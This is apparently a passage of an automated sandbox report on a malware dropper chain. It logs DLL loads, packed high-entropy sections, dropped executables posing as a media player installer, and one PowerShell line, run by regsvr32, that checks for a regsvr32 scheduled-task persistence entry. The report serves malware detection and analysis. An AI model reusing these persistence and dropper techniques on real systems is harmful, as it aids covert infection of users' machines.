Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: riched20.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: usp10.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: msls31.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: explorerframe.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: sfc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: sfc_os.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Section loaded: sqlite3.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Section loaded: version.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Section loaded: appxsip.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Section loaded: opcservices.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\regsvr32.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: apphelp.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: aclayers.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: sfc_os.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\regsvr32.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Window found: window name: TMainForm
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Cross-platform Player_is1
Source: p199AjsEFs.exe Static file information: File size 1861632 > 1048576
Source: p199AjsEFs.exe Static PE information: Raw size of cwtcsdxi is bigger than: 0x100000 < 0x19b200
Source: Binary string: c:\zlib-dll\Release\isunzlib.pdb source: 264662bead.tmp, 00000010.00000003.3388150366.0000000002150000.00000004.00001000.00020000.00000000.sdmp, 264662bead.tmp, 00000010.00000003.3387702350.00000000034D5000.00000004.00001000.00020000.00000000.sdmp, 264662bead.tmp, 00000010.00000003.3383941896.00000000031A0000.00000004.00001000.00020000.00000000.sdmp, 264662bead.tmp, 00000012.00000003.3397747715.0000000002230000.00000004.00001000.00020000.00000000.sdmp, _isdecmp.dll.16.dr

Data Obfuscation

Source: C:\Users\user\AppData\Local\Temp\HT94GNC6NP3AGR6EM8I9D3647.exe Unpacked PE file: 3.2.HT94GNC6NP3AGR6EM8I9D3647.exe.330000.0.unpack :EW;.rsrc:W;.idata :W; :EW;npkeuccx:EW;rvvqxzxr:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;npkeuccx:EW;rvvqxzxr:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe Unpacked PE file: 4.2.6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe.ac0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;npzhibgu:EW;dbasugji:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;npzhibgu:EW;dbasugji:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 6.2.skotes.exe.1e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;npzhibgu:EW;dbasugji:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;npzhibgu:EW;dbasugji:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 7.2.skotes.exe.1e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;npzhibgu:EW;dbasugji:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;npzhibgu:EW;dbasugji:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Unpacked PE file: 9.2.skotes.exe.1e0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;npzhibgu:EW;dbasugji:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;npzhibgu:EW;dbasugji:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Unpacked PE file: 14.2.crossplatformplayer.exe.400000.0.unpack .text:EW;.rdata:R;.data:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.vmp0:ER;.rsrc:R;
Source: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe Unpacked PE file: 14.2.crossplatformplayer.exe.400000.0.unpack
Source: dedicleb.exe.9.dr, ClientManager.cs .Net Code: MeditationMonitor System.AppDomain.Load(byte[])
Source: dedicleb.exe.9.dr, ClientManager.cs .Net Code: MeditationMonitor
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask | Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
Source: initial sample Static PE information: section where entry point is pointing to: .taggant
Source: 264662bead.tmp.15.dr Static PE information: real checksum: 0x0 should be: 0x122532
Source: 264662bead.tmp.17.dr Static PE information: real checksum: 0x0 should be: 0x122532
Source: random[1].exe1.9.dr Static PE information: real checksum: 0x0 should be: 0x16fc42
Source: is-IPK0L.tmp.13.dr Static PE information: real checksum: 0x0 should be: 0x14980c
Source: is-SE3IR.tmp.18.dr Static PE information: real checksum: 0x319701 should be: 0x30ff91
Source: p199AjsEFs.exe Static PE information: real checksum: 0x1c9203 should be: 0x1d327b
Source: 264662bead.exe.9.dr Static PE information: real checksum: 0x0 should be: 0x16fc42
Source: 93f981a153.tmp.12.dr Static PE information: real checksum: 0x0 should be: 0xbc496
Source: is-0867F.tmp.18.dr Static PE information: real checksum: 0x0 should be: 0x1308eb
Source: _setup64.tmp.18.dr Static PE information: real checksum: 0x0 should be: 0x8546
Source: _setup64.tmp.16.dr Static PE information: real checksum: 0x0 should be: 0x8546
Source: dedicleb[1].exe.9.dr Static PE information: real checksum: 0x0 should be: 0x3ca4a
Source: skotes.exe.4.dr Static PE information: real checksum: 0x1d5c9f should be: 0x1d7693
Source: is-GPTU0.tmp.13.dr Static PE information: real checksum: 0x0 should be: 0xb5141
Source: is-DIKDD.tmp.13.dr Static PE information: real checksum: 0x0 should be: 0x1b9553
Source: random[1].exe.9.dr Static PE information: real checksum: 0x1db14d should be: 0x1e0071
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe.0.dr Static PE information: real checksum: 0x1d5c9f should be: 0x1d7693
Source: random[1].exe0.9.dr Static PE information: real checksum: 0x0 should be: 0x3886e4
Source: HT94GNC6NP3AGR6EM8I9D3647.exe.0.dr Static PE information: real checksum: 0x1c0bdd should be: 0x1bdc29
Source: dedicleb.exe.9.dr Static PE information: real checksum: 0x0 should be: 0x3ca4a
Source: _iscrypt.dll.13.dr Static PE information: real checksum: 0x0 should be: 0x89d2
Source: _isdecmp.dll.16.dr Static PE information: real checksum: 0x0 should be: 0x5528
Source: _isdecmp.dll.18.dr Static PE information: real checksum: 0x0 should be: 0x5528
Source: 93f981a153.exe.9.dr Static PE information: real checksum: 0x0 should be: 0x3886e4
Source: p199AjsEFs.exe Static PE information: section name:
Source: p199AjsEFs.exe Static PE information: section name: .idata
Source: p199AjsEFs.exe Static PE information: section name:
Source: p199AjsEFs.exe Static PE information: section name: cwtcsdxi
Source: p199AjsEFs.exe Static PE information: section name: vyjhahjk
Source: p199AjsEFs.exe Static PE information: section name: .taggant
Source: HT94GNC6NP3AGR6EM8I9D3647.exe.0.dr Static PE information: section name:
Source: HT94GNC6NP3AGR6EM8I9D3647.exe.0.dr Static PE information: section name: .idata
Source: HT94GNC6NP3AGR6EM8I9D3647.exe.0.dr Static PE information: section name:
Source: HT94GNC6NP3AGR6EM8I9D3647.exe.0.dr Static PE information: section name: npkeuccx
Source: HT94GNC6NP3AGR6EM8I9D3647.exe.0.dr Static PE information: section name: rvvqxzxr
Source: HT94GNC6NP3AGR6EM8I9D3647.exe.0.dr Static PE information: section name: .taggant
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe.0.dr Static PE information: section name:
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe.0.dr Static PE information: section name: .idata
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe.0.dr Static PE information: section name:
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe.0.dr Static PE information: section name: npzhibgu
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe.0.dr Static PE information: section name: dbasugji
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe.0.dr Static PE information: section name: .taggant
Source: skotes.exe.4.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name: .idata
Source: skotes.exe.4.dr Static PE information: section name:
Source: skotes.exe.4.dr Static PE information: section name: npzhibgu
Source: skotes.exe.4.dr Static PE information: section name: dbasugji
Source: skotes.exe.4.dr Static PE information: section name: .taggant
Source: random[1].exe.9.dr Static PE information: section name:
Source: random[1].exe.9.dr Static PE information: section name: .idata
Source: random[1].exe.9.dr Static PE information: section name:
Source: random[1].exe.9.dr Static PE information: section name: qqtrmnsk
Source: random[1].exe.9.dr Static PE information: section name: nskkxmzy
Source: random[1].exe.9.dr Static PE information: section name: .taggant
Source: is-DFNTB.tmp.13.dr Static PE information: section name: /4
Source: is-DFNTB.tmp.13.dr Static PE information: section name: /19
Source: is-DFNTB.tmp.13.dr Static PE information: section name: /35
Source: is-DFNTB.tmp.13.dr Static PE information: section name: /51
Source: is-DFNTB.tmp.13.dr Static PE information: section name: /63
Source: is-DFNTB.tmp.13.dr Static PE information: section name: /77
Source: is-DFNTB.tmp.13.dr Static PE information: section name: /89
Source: is-DFNTB.tmp.13.dr Static PE information: section name: /102
Source: is-DFNTB.tmp.13.dr Static PE information: section name: /113
Source: is-DFNTB.tmp.13.dr Static PE information: section name: /124
Source: sqlite3.dll.14.dr Static PE information: section name: /4
Source: sqlite3.dll.14.dr Static PE information: section name: /19
Source: sqlite3.dll.14.dr Static PE information: section name: /35
Source: sqlite3.dll.14.dr Static PE information: section name: /51
Source: sqlite3.dll.14.dr Static PE information: section name: /63
Source: sqlite3.dll.14.dr Static PE information: section name: /77
Source: sqlite3.dll.14.dr Static PE information: section name: /89
Source: sqlite3.dll.14.dr Static PE information: section name: /102
Source: sqlite3.dll.14.dr Static PE information: section name: /113
Source: sqlite3.dll.14.dr Static PE information: section name: /124
Source: is-SE3IR.tmp.18.dr Static PE information: section name: .xdata
Source: is-SE3IR.tmp.18.dr Static PE information: section name: /4
Source: is-SE3IR.tmp.18.dr Static PE information: section name: /19
Source: is-SE3IR.tmp.18.dr Static PE information: section name: /35
Source: is-SE3IR.tmp.18.dr Static PE information: section name: /47
Source: is-SE3IR.tmp.18.dr Static PE information: section name: /61
Source: is-SE3IR.tmp.18.dr Static PE information: section name: /73
Source: is-SE3IR.tmp.18.dr Static PE information: section name: /86
Source: is-SE3IR.tmp.18.dr Static PE information: section name: /97
Source: is-SE3IR.tmp.18.dr Static PE information: section name: /113
Source: is-SE3IR.tmp.18.dr Static PE information: section name: /127
Source: is-SE3IR.tmp.18.dr Static PE information: section name: /143
Source: is-SE3IR.tmp.18.dr Static PE information: section name: /159
Source: C:\Users\user\Desktop\p199AjsEFs.exe Code function: 0_3_055ED4D2 push edx; ret 0_3_055ED4D4
Source: C:\Users\user\Desktop\p199AjsEFs.exe Code function: 0_3_055ED4D2 push edx; ret 0_3_055ED4D4
Source: C:\Users\user\Desktop\p199AjsEFs.exe Code function: 0_3_055EC492 push edx; ret 0_3_055EC494
Source: C:\Users\user\Desktop\p199AjsEFs.exe Code function: 0_3_055EC492 push edx; ret 0_3_055EC494
Source: C:\Users\user\Desktop\p199AjsEFs.exe Code function: 0_3_055EE512 push edx; ret 0_3_055EE514
Source: C:\Users\user\Desktop\p199AjsEFs.exe Code function: 0_3_055EE512 push edx; ret 0_3_055EE514
Source: C:\Users\user\Desktop\p199AjsEFs.exe Code function: 0_3_055ED4D2 push edx; ret 0_3_055ED4D4
Source: C:\Users\user\Desktop\p199AjsEFs.exe Code function: 0_3_055ED4D2 push edx; ret 0_3_055ED4D4
Source: C:\Users\user\Desktop\p199AjsEFs.exe Code function: 0_3_055EC492 push edx; ret 0_3_055EC494
Source: C:\Users\user\Desktop\p199AjsEFs.exe Code function: 0_3_055EC492 push edx; ret 0_3_055EC494
Source: C:\Users\user\Desktop\p199AjsEFs.exe Code function: 0_3_055EE512 push edx; ret 0_3_055EE514
Source: C:\Users\user\Desktop\p199AjsEFs.exe Code function: 0_3_055EE512 push edx; ret 0_3_055EE514
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe Code function: 9_2_001FD91C push ecx; ret 9_2_001FD92F
Source: p199AjsEFs.exe Static PE information: section name: entropy: 7.9859001084853825
Source: p199AjsEFs.exe Static PE information: section name: cwtcsdxi entropy: 7.954013880613041
Source: HT94GNC6NP3AGR6EM8I9D3647.exe.0.dr Static PE information: section name: npkeuccx entropy: 7.953889894291722
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe.0.dr Static PE information: section name: entropy: 7.985334345549936
Source: 6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe.0.dr Static PE information: section name: npzhibgu entropy: 7.953247194647626
Source: skotes.exe.4.dr Static PE information: section name: entropy: 7.985334345549936
Source: skotes.exe.4.dr Static PE information: section name: npzhibgu entropy: 7.953247194647626
Source: random[1].exe.9.dr Static PE information: section name: entropy: 7.984381680379524
Source: random[1].exe.9.dr Static PE information: section name: qqtrmnsk entropy: 7.953843925231993
Source: is-4B81S.tmp.13.dr Static PE information: section name: .text entropy: 6.90903234258047
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\libGLESv2.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp File created: C:\Users\user\AppData\Roaming\uxtheme_2.drv (copy)
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\Qt5PrintSupport.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\BLNS00AZ\dedicleb[1].exe
Source: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe File created: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp File created: C:\Users\user\AppData\Local\Temp\is-6SD2B.tmp\_isetup\_isdecmp.dll
Source: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe File created: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1053899001\dedicleb.exe
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\msvcr100.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-DFNTB.tmp
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Temp\is-29I1I.tmp\_isetup\_iscrypt.dll
Source: C:\Users\user\Desktop\p199AjsEFs.exe File created: C:\Users\user\AppData\Local\Temp\6TSAN5F3YRX0XE8PU5LBJ0KTXYLH0B.exe
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-4B81S.tmp
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Temp\is-29I1I.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\random[1].exe
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\icuin51.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-H4609.tmp
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-IPK0L.tmp
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp File created: C:\Users\user\AppData\Local\Temp\is-RHTN2.tmp\_isetup\_isdecmp.dll
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp File created: C:\Users\user\AppData\Local\Temp\is-6SD2B.tmp\_isetup\_setup64.tmp
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\is-3OCBE.tmp
Source: C:\Users\user\AppData\Local\Temp\is-HUOCA.tmp\264662bead.tmp File created: C:\Users\user\AppData\Local\Temp\is-6SD2B.tmp\_isetup\_shfoldr.dll
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe File created: C:\Users\user\AppData\Local\Temp\1053902001\264662bead.exe
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\crossplatformplayer.exe
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\sqlite3.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp File created: C:\Users\user\AppData\Local\is-0867F.tmp
Source: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp File created: C:\Users\user\AppData\Local\Cross-platform Player 3.99\libEGL.dll (copy)
Source: C:\Users\user\AppData\Local\Temp\is-114TS.tmp\264662bead.tmp File created: C:\Users\user\AppData\Roaming\is-SE3IR.tmp
Source: C:\Users\user\AppData\Local\Temp\1053901001\93f981a153.exe File created: C:\Users\user\AppData\Local\Temp\is-DHJKB.tmp\93f981a153.tmp
